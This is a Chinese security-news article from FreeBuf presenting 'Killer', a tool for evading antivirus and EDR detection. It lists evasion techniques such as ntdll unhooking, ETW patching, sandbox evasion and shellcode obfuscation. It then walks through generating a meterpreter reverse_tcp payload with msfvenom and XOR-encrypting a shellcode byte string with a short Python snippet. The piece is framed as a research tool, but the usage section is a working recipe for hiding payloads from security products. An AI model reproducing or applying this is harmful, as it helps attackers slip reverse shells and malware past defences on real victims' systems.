freeBuf
如何使用Killer绕过AV和EDR等安全检测产品
2023-07-13 19:55:58
所属地 广西

关于Killer

Killer是一款针对AV和EDR的绕过工具,在该工具的帮助下,广大研究人员可以通过绕过AV和EDR等安全检测工具,来测试目标安全防护产品的安全性能。

功能介绍

1、实现了针对内存扫描绕过的Module Stomping技术;

2、通过刷新ntdll副本解DLL钩子;

3、IAT隐藏和混淆&API解钩子;

4、实现了用于用于绕过某些安全控制的ETW补丁;

5、包含沙盒规避技术和基本反调试;

6、通过XOR实现完全代码混淆(函数-键-Shellcode);

7、Shellcode混淆、反混淆和加密;

8、在不使用API的情况下将Payload移动到内存中;

9、在不创建新线程的情况下运行,支持x64和x86架构;

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/0xHossam/Killer.git

工具使用

首先,使用msfvenom工具生成你自己的Shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py

接下来,将输出结果拷贝到加密器XOR函数中:

data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

 

    key  = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...

 

    print('{ ', end='')

    for i in data:

        print(hex(i ^ key), end=', ')

 

print("0x0 };") # Notice that it adds one byte "0x0" to the end.

最后,你就可以处理你自己的解密函数了,工具运行后的结果如下所示:

检测结果

项目地址

Killer:【GitHub传送门

参考资料

https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5

https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354

https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7

https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e

https://www.facebook.com/abdallah.elsharif07

https://github.com/abdallah-elsharif

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
文章目录